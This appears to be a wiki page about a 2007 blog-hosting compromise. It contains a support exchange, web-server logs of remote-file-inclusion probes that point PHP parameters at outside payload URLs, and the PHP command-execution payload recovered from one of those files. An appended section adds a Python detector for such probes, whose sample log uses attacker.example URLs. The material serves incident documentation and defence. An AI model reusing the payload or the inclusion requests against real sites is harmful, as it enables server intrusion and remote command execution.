
Joyent20071107

Page history last edited by Chris Messina 16 years, 10 months ago

Sent 20071107 via customer.joyent.com


 

I'm afraid that my account has been compromised. I don't know how or what happened (or how to figure it out) but if you could look into it, that'd be great.

 

Anyway, I logged into my /blog account today on NELSON and saw two directories that I didn't recognize:

 

blog/rh4m4.t35.com

blog/www.kolortavil.org

 

These both seem to direct to spam sites, so I presume that they've gained access to my account, though I don't know how.

 

Can you check the logs and let me know what you find? Thanks,

 

Chris


 

Response from Kristie Wells at Nov 7, 2007 7:44 PM:

 

Chris,

 

I meant to include this piece in your support ticket.


88.191.39.142 - - [07/Nov/2007:17:43:07 +0000] "GET /drupal/?_menu[callbacks][1][callback]=http://www.kolortavil.org/Connections/ok.txt? HTTP/1.1" 404 205 "-" "libwww-perl/5.79"
88.191.39.142 - - [07/Nov/2007:17:43:02 +0000] "GET /blog/category/what-i-do/drupal/page/5/drupal/?_menu[callbacks][1][callback]=http://www.kolortavil.org/Connections/ok.txt? HTTP/1.1" 503 323 "-" "libwww-perl/5.79"
88.191.39.142 - - [07/Nov/2007:17:43:07 +0000] "GET /blog/category/what-i-do/drupal/page/drupal/?_menu[callbacks][1][callback]=http://www.kolortavil.org/Connections/ok.txt? HTTP/1.1" 200 13257 "-" "libwww-perl/5.79"

The breach appears to be from a dedicated IP in France for a probably known script kiddie, so we are blocking that IP from all the shared servers.

 

Cheers,

Kristie


 

My reply at Nov 7, 2007 7:51 PM:

 

Cool. It turns out that it was the wp-super-cache plugin [1]. I've seen about 4-5 other reports of the same problem:

 

http://twitter.com/stefsull/statuses/396379352

http://twitter.com/tiffanybbrown/statuses/396344922

http://twitter.com/tiffanybbrown/statuses/396362442

http://tiffanybbrown.com/2007/11/07/damn-my-vps-is-being-cracked/

 

;)

 

Thanks for the follow up.

 

Chris

 

[1] http://wordpress.org/support/topic/142480?replies=2


 

Notes

 

Here is the script that was at the end of ok.txt:

 


<?php
// Payload fetched by the RFI request above: prints a marker string, then runs
// `id` through whichever command-execution function the host has left enabled.
echo "Mic22";
$cmd = "id";
$eseguicmd = ex($cmd);
echo $eseguicmd;

// Try exec, shell_exec, system, passthru and popen in turn, so the payload
// still runs when some of them are listed in PHP's disable_functions.
function ex($cfe) {
    $res = '';
    if (!empty($cfe)) {
        if (function_exists('exec')) {
            @exec($cfe, $res);
            $res = join("\n", $res);
        }
        elseif (function_exists('shell_exec')) {
            $res = @shell_exec($cfe);
        }
        elseif (function_exists('system')) {
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif (function_exists('passthru')) {
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif (@is_resource($f = @popen($cfe, "r"))) {
            $res = "";
            while (!@feof($f)) { $res .= @fread($f, 1024); }
            @pclose($f);
        }
    }
    return $res;
}
exit;

 

Further reviewing my logs, I found:

 


194.108.193.138 - - [07/Nov/2007:22:27:24 +0000] "GET /blog/2007/07/18/wordpressmu-making-a-smart-platform-choice/start.php?var=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 412 302 "-" "libwww-perl/5.79"
194.108.193.138 - - [07/Nov/2007:22:27:24 +0000] "GET /start.php?var=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 412 243 "-" "libwww-perl/5.79"
67.15.54.5 - - [07/Nov/2007:23:19:19 +0000] "GET /blog/2007/07/10/my-default-wordpress-setup-17-must-have-plugins/wamp_dir/setup/yesno.phtml?no_url=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 8333 "-" "libwww-perl/5.808"
67.15.54.5 - - [07/Nov/2007:23:19:19 +0000] "GET /wamp_dir/setup/yesno.phtml?no_url=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 224 "-" "libwww-perl/5.808"
67.15.54.5 - - [07/Nov/2007:23:19:20 +0000] "GET /blog/2007/07/10/wamp_dir/setup/yesno.phtml?no_url=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 8237 "-" "libwww-perl/5.808"
 
81.173.18.20 - - [08/Nov/2007:22:14:01 +0000] "GET /blog/2005/04/30/the-full-%3Cwbr%20/%3Edish-on-the-always-use-prot.../index.php?p=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 412 312 "-" "libwww-perl/5.805"
81.173.18.20 - - [08/Nov/2007:22:14:02 +0000] "GET /index.php?p=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 300 491 "-" "libwww-perl/5.805"
81.173.18.20 - - [08/Nov/2007:22:14:02 +0000] "GET /blog/2005/04/30/the-full-%3Cwbr%20/index.php?p=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 8386 "-" "libwww-perl/5.805"

222.239.78.91 - - [08/Nov/2007:23:54:55 +0000] "GET /wamp_dir/setup/yesno.phtml?no_url=http://www.medialed.com/ledlink/x? HTTP/1.1" 404 224 "-" "libwww-perl/5.803"
222.239.78.91 - - [08/Nov/2007:23:54:55 +0000] "GET /blog/2007/07/10/wamp_dir/setup/yesno.phtml?no_url=http://www.medialed.com/ledlink/x? HTTP/1.1" 404 8651 "-" "libwww-perl/5.803"
222.239.78.91 - - [08/Nov/2007:23:54:49 +0000] "GET /blog/2007/07/10/my-default-wordpress-setup-17-must-have-plugins/wamp_dir/setup/yesno.phtml?no_url=http://www.medialed.com/ledlink/x? HTTP/1.1" 404 8747 "-" "libwww-perl/5.803"
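As an added example that is not part of the original page or the support ticket: a small Python script that flags the request pattern visible in the log lines above, a query-string parameter whose value is itself an absolute URL, across Apache combined-format lines. The sample log embedded in it is constructed, using reserved documentation addresses and hostnames instead of the real ones from the ticket; the field names and the triage heuristic (2xx first) are my own.

```python
"""Flag remote-file-inclusion (RFI) probes in Apache combined-format logs.

Added example. The tell-tale pattern in the log excerpts on this page is a
query-string parameter whose *value* is itself an absolute URL
(callback=http://..., var=http://..., p=http://...). The trailing "?" on those
URLs is deliberate: whatever the vulnerable script appends to the included
path becomes a harmless query string on the attacker's server.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" log format, as in the excerpts above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
URL_SCHEME_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def rfi_params(target):
    """Query parameters of a request target whose decoded value is an absolute URL."""
    _path, _sep, query = target.partition('?')
    # parse_qsl percent-decodes, so p=http%3A%2F%2F... is caught as well as p=http://...
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if URL_SCHEME_RE.match(value)]


def scan(lines):
    """One finding per request that carries at least one URL-valued parameter."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = rfi_params(rec['target'])
        if not hits:
            continue
        status = int(rec['status'])
        findings.append({
            'ip': rec['ip'],
            'timestamp': rec['ts'],
            'target': rec['target'],
            'status': status,
            # A 2xx answer to a probe is what to triage first: the request reached
            # a script that ran to completion. 404/412/503 probes still show intent.
            'likely_success': 200 <= status < 300,
            'params': hits,
            # Every scanner in the excerpts above identified itself as libwww-perl.
            'scripted_client': rec['ua'].startswith('libwww-perl'),
            'dangling_query': any(v.endswith('?') for _, v in hits),
        })
    return findings


def summarize(findings):
    """Per-source-IP view: probe count, payload hosts used, and whether any got a 2xx."""
    by_ip = {}
    for f in findings:
        s = by_ip.setdefault(f['ip'], {'probes': 0, 'hosts': set(), 'any_2xx': False})
        s['probes'] += 1
        s['any_2xx'] = s['any_2xx'] or f['likely_success']
        for _, v in f['params']:
            s['hosts'].add(urlsplit(v).netloc)   # the server hosting the payload
    return by_ip


# Constructed sample log: same shape as the excerpts above, but with reserved
# documentation addresses and hostnames (192.0.2.0/24, 198.51.100.0/24,
# 203.0.113.0/24, *.example) instead of the real ones from the ticket.
SAMPLE_LOG = """\
192.0.2.10 - - [07/Nov/2007:17:43:07 +0000] "GET /drupal/?_menu[callbacks][1][callback]=http://attacker.example/ok.txt? HTTP/1.1" 404 205 "-" "libwww-perl/5.79"
192.0.2.10 - - [07/Nov/2007:17:43:07 +0000] "GET /blog/category/page/drupal/?_menu[callbacks][1][callback]=http://attacker.example/ok.txt? HTTP/1.1" 200 13257 "-" "libwww-perl/5.79"
198.51.100.7 - - [08/Nov/2007:22:14:02 +0000] "GET /index.php?p=http%3A%2F%2Fattacker.example%2Fid.txt%3F HTTP/1.1" 300 491 "-" "libwww-perl/5.805"
203.0.113.5 - - [08/Nov/2007:09:00:00 +0000] "GET /blog/?s=http+security HTTP/1.1" 200 8000 "http://example.net/" "Mozilla/5.0"
203.0.113.5 - - [08/Nov/2007:09:00:01 +0000] "GET /blog/feed/?redirect=/blog/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

if __name__ == '__main__':
    findings = scan(SAMPLE_LOG.splitlines())
    for f in findings:
        flag = 'TRIAGE' if f['likely_success'] else 'probe '
        print(f"{flag} {f['ip']} {f['status']} {f['params']}")
    for ip, s in summarize(findings).items():
        print(ip, s)
```

The two ordinary browser requests in the sample (a search for "http security" and a relative redirect parameter) are there as controls: the check keys on a decoded value that starts with a URL scheme and "://", not on the substring "http", so neither is flagged. Hits from the same source against several paths in the same second, as in the excerpts above, are the signature of a scanner trying a payload URL against every path it has seen on the site.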
